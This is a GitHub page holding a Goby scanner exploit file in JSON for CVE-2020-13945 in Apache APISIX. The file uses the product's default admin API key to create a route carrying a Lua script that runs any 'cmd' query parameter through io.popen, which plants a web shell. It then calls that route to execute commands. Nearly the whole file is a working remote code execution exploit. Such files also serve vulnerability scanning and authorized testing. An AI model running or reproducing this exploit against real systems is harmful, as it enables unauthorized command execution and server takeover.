-
Notifications
You must be signed in to change notification settings - Fork 33
/
Copy pathApache_APISIX_Admin_API_Default_Token_CVE_2020_13945.json
107 lines (107 loc) · 4.51 KB
/
Apache_APISIX_Admin_API_Default_Token_CVE_2020_13945.json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
{
"Name": "Apache APISIX Admin API Default Token CVE-2020-13945",
"Level": "1",
"Tags": [
"defaulttoken"
],
"GobyQuery": "header=\"APISIX\"",
"Description": "The Apache APISIX Dashboard is designed to make it as easy as possible for users to operate Apache APISIX through a frontend interface.",
"Product": "Apache APISIX Dashboard",
"Homepage": "https://apisix.apache.org/",
"Author": "",
"Impact": "In Apache APISIX, the user enabled the Admin API and deleted the Admin API access IP restriction rules. Eventually, the default token is allowed to access APISIX management data. This affects versions 1.2, 1.3, 1.4, 1.5.",
"Recommendation": "",
"References": [
"https://nvd.nist.gov/vuln/detail/CVE-2020-13945",
"https://packetstormsecurity.com/files/166228/Apache-APISIX-Remote-Code-Execution.html"
],
"HasExp": true,
"ExpParams": [
{
"Name": "Command",
"Type": "input",
"Value": "id"
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/apisix/admin/routes",
"follow_redirect": true,
"header": {
"X-API-KEY": "edd1c9f034335f136f87ad84b625c8f1",
"Content-Type": "application/json"
},
"data_type": "text",
"data": "{\r\n \"uri\": \"/attack\",\r\n\"script\": \"local _M = {} \\n function _M.access(conf, ctx) \\n local os = require('os')\\n local args = assert(ngx.req.get_uri_args()) \\n local f = assert(io.popen(args.cmd, 'r'))\\n local s = assert(f:read('*a'))\\n ngx.say(s)\\n f:close() \\n end \\nreturn _M\",\r\n \"upstream\": {\r\n \"type\": \"roundrobin\",\r\n \"nodes\": {\r\n \"example.com:80\": 1\r\n }\r\n }\r\n}",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "201",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "attack",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/attack?cmd={{{Command}}}",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "uid",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|(.*)"
]
}
],
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}